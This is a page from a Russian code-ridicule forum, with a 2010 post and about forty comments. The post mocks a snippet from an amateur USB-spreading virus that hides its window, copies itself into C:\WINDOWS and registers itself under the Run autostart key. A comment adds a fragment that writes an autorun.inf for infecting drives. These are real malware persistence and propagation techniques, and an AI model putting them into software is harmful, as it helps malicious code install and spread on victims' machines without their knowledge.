1. C++ / Говнокод #3327

    +168

    1. 01
    2. 02
    3. 03
    4. 04
    5. 05
    6. 06
    7. 07
    8. 08
    9. 09
    10. 10
    11. 11
    12. 12
    13. 13
    14. 14
    15. 15
    16. 16
    void __fastcall TForm1::FormCreate(TObject *Sender)
    {
    Application->ShowMainForm=false; //прячимся
    
    // Осваеваемся в новой системе
    if(ParamStr(0)!="C:\\WINDOWS\\WebKill_USB_Flash_V.exe") {
    //скопируемся
    CopyFile(ParamStr(0).c_str(),"C:\\WINDOWS\\WebKill_USB_Flash_V.exe",true);
    //и пропишимся в автозагрузку:
    TRegistry *reg=new TRegistry;
    reg->RootKey=HKEY_LOCAL_MACHINE;
    reg->OpenKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", false);
    reg->WriteString("SystemX" , "C:\\WINDOWS\\WebKill_USB_Flash_V.exe");
    reg->CloseKey();
    reg->Free();
    }

    ПРЯЧИМСЯ (с) всеми извесный убиватель интернетов и "пейсатель" вирусов, которые грузятся с флэшки, бугога. Самый няшный кусочек :-) Хотя там ещё было убер заражение подключённых устройств. Судите сами господа http://3.webkill.ru/flash_virus.html

    Запостил: This is obvious, 26 Мая 2010

    Комментарии (40) RSS

    • Ух тыыы, как круто. А зачем нужна главная форма, если всё равно она "прячится"?
      Ответить
      • а как тебе путь, куда копируемся ? и вообще "осваивание в новой системе" ?:D
        Ответить
        • Хз, у меня вообще в автозагрузке нет нихера. А если появится, то сразу получит.
          Ответить
      • Это windows-way. Тамошние приложения общаются через сообщения, которые привязаны к окну.
        Ответить
        • Это webkill-way. В windows принимать сообщения может и сам процесс
          Ответить
    • ОЛОЛО! Это же вебкилл!
      Ответить
    • "PS.
      Написано в целях изучения подобных технологий, небудьте жестокими, любите жизнь =)
      Ответственность за безконтрольное распространение вируса основаного на моём коде ложиться на того кто это всё компелировал, и дал "другу посмотреть"
      Компеляторы компелировали компелировали да не выкомпелировали :)
      Ответить
    • Реквестирую УебКилла для наказания неверных!
      Ответить
    • гыы, особо радует хардкод "c:\\windows".

      Впрочем, уебкилл -- школота и скрипт-кидди, от него этим за версту пахнет. "Хакинг", мля).
      Ответить
      • что-то мне подсказывает что OVER 50% вирусов пишут таким хардкодом. Нужно сменить букву диска ;-D
        Ответить
        • over 90,0% компов имеют винду в c:\windows, так что не так уж и говёно
          Ответить
    • Форма нужна потому что не знают как ее убрать.
      Ответить
    • Там третей коминтарей ниверно написон, далжно быть "скопируимся"!
      Ответить
    • WebKill забил на веб. Теперь переключился на ваш компьютер. Кто станет следующей жертвой?
      Ответить
    • Там дальше доставляет кусочек:
      if(F)
      {
      fprintf(F, "[autorun]\n"); // создаём загрузочную запись
      fprintf(F, "open=1v.exe\n");
      fprintf(F, "shell=Открыть\n");

      fclose(F);
      }
      }
      /*
      else
      {
      ShowMessage(String("Cannot open file \"") + S + "\"");
      }

      фиерическое юзабилити - "вирус" выдает пользователю сообщения об ошибке, приятненько.
      Ответить
      • Хаха, хули, я помню ковырял троян, который из диболдовских банкоматов пины пиздил -- таг он был на делфи(а ебанэ стыт!) написан и тоже так об ошибках сообщал =). Таг он там и понапиздил реально всего дохера =)
        Ответить
        • зоибал пейсать на падонкоффском йазыке, сийчас токое нивмоде, все пилотки нетвойи
          Ответить
        • Интересно, как он в банкоматы эти попал o_O простите моюсерость, я не знаю, что такое диболдовские
          Ответить
          • diebold — фирма такая. Плюс к тому, человек и пароходпротокол.
            Ответить
          • Да, вирус на emv-карточках. Вставляешь ее в банкомат, ну, как флешку, ага. А она берет и заражает. Или заражается, как повезет!
            Ответить
            • Ужасы какие...какртонки заряженные трояном на дельфи прячутся, осваиваются, прописываются и порабощают банкоматы - вебкилы ликуют, а анонимус плачет
              Ответить
              • Нех гнать на анона. Сейчас ты заплачешь.
                Ответить
    • зато вебкила все интернеты знают) и никого из нас=)
      Ответить
      • Нахуй такая слава.
        Ответить
        • Его реально никто не знает. Если он придёт на работу - он же не будет говорить - я уёбкил. Так, что - для него это без последствий.
          Ответить
      • Говори за себя. А я вот - анонимус, меня знают все интернеты.
        Ответить
      • Может дать ему ссылку на данный ресурс?)
        Ответить
    • Выполнением заказов занимается команда фрилансеров с webkill.ru
      WebKill горантирует надёжность и качество выполняемых заказов.

      -----
      бля, он не один =\ Я Вам "горонтирую".
      Ответить
    • прячимся > прячемся
      осваеваемся > осваиваемся
      пропишимся > пропишемся

      лол, парень нигде не угадал
      Ответить
    • В течение всего "выступления" Катерины он смотрел в нашу сторону так, будто ненавидел её всей душой, а когда она меня обняла, так и вовсе мысленно четвертовал её.
      Ответить

    Добавить комментарий